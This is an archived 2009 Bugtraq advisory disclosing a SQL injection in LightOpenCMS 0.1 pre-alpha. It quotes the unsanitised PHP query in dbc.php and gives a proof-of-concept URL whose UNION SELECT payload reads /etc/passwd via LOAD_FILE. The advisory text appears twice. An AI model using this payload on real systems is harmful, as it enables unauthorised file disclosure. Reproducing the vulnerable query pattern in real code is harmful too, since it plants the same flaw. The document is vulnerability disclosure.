LightOpenCMS 0.1 pre-alpha Remote SQL Injection
- To: Bugtraq <bugtraq@xxxxxxxxxxxxxxxxx>, str0ke <milw0rm@xxxxxxxxx>
- Subject: LightOpenCMS 0.1 pre-alpha Remote SQL Injection
- From: "Salvatore \"drosophila\" Fresta" <drosophilaxxx@xxxxxxxxx>
- Date: Fri, 5 Jun 2009 15:38:17 +0200
- Dkim-signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:date:message-id:subject :from:to:content-type; bh=wWmfpYjS9vDsx3aRMo4B+RIlQ9ejxcDdg+VAUSNIONg=; b=HNF7cC4zA07BKApQ4kX6S+VTlu3Kv+xhV+2G48i6IQEXkBew6NVPTUVYkmPEE3v/Pl ipXVjGCAGQdn4VU3v838QbUA91Yxm6/fQtZYd5/1W3Q5zmudyosEKv2Swmkyx3ZByn6k UD34ZMMABrAry4qMDwDvaJnfmI8ElKQEHba6k=
- Domainkey-signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:date:message-id:subject:from:to:content-type; b=O9L+j+nZDprZ6NHLjixeIJuH2zDEYjPRSI6Y17+ROcbJ9/5qrm6nxLV+dCubFf8zA/ NABEYVk73aFNrbW5DHYpgy2CwlOdQcK82gmO6jZVn6VYCMFFSAPDrMjffK3kFrPm+wyk 6SLe+5s6INdjJU+8eYW9D34pmGDR1+M2WXrnU=
- List-help: <mailto:bugtraq-help@securityfocus.com>
- List-id: <bugtraq.list-id.securityfocus.com>
- List-post: <mailto:bugtraq@securityfocus.com>
- List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
- List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
- Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
******** Salvatore "drosophila" Fresta ********
[+] Application: LightOpenCMS
[+] Version: 0.1 pre-alpha
[+] Website: http://sourceforge.net/projects/lightopencms
[+] Bugs: [A] Remote SQL Injection
[+] Exploitation: Remote
[+] Date: 05 Jun 2009
[+] Discovered by: Salvatore Fresta aka drosophila
[+] Author: Salvatore Fresta aka drosophila
[+] E-mail: drosophilaxxx [at] gmail.com
***************************************************
[+] Menu
1) Bugs
2) Code
3) Fix
***************************************************
[+] Bugs
- [A] Remote SQL Injection
[-] Risk: medium
[-] Requisites: magic_quotes_gpc = off
[-] File affected: dbc.php
This bug allows a guest to inject arbitrary SQL
statments.
...
if (isset($_GET['id'])) {
$result = mysql_query("SELECT * FROM pages WHERE
id='".$_GET['id']."'");
return mysql_fetch_assoc($result);
...
***************************************************
[+] Code
- [A] Remote SQL Injection
http://www.site.com/path/index.php?id=-1' UNION ALL SELECT
1,2,LOAD_FILE('/etc/passwd'),4%23
***************************************************
[+] Fix
No fix.
***************************************************
--
Salvatore Fresta aka drosophila
CWNP444351
******** Salvatore "drosophila" Fresta ********
[+] Application: LightOpenCMS
[+] Version: 0.1 pre-alpha
[+] Website: http://sourceforge.net/projects/lightopencms
[+] Bugs: [A] Remote SQL Injection
[+] Exploitation: Remote
[+] Date: 05 Jun 2009
[+] Discovered by: Salvatore Fresta aka drosophila
[+] Author: Salvatore Fresta aka drosophila
[+] E-mail: drosophilaxxx [at] gmail.com
***************************************************
[+] Menu
1) Bugs
2) Code
3) Fix
***************************************************
[+] Bugs
- [A] Remote SQL Injection
[-] Risk: medium
[-] Requisites: magic_quotes_gpc = off
[-] File affected: dbc.php
This bug allows a guest to inject arbitrary SQL
statments.
...
if (isset($_GET['id'])) {
$result = mysql_query("SELECT * FROM pages WHERE
id='".$_GET['id']."'");
return mysql_fetch_assoc($result);
...
***************************************************
[+] Code
- [A] Remote SQL Injection
http://www.site.com/path/index.php?id=-1' UNION ALL SELECT
1,2,LOAD_FILE('/etc/passwd'),4%23
***************************************************
[+] Fix
No fix.
***************************************************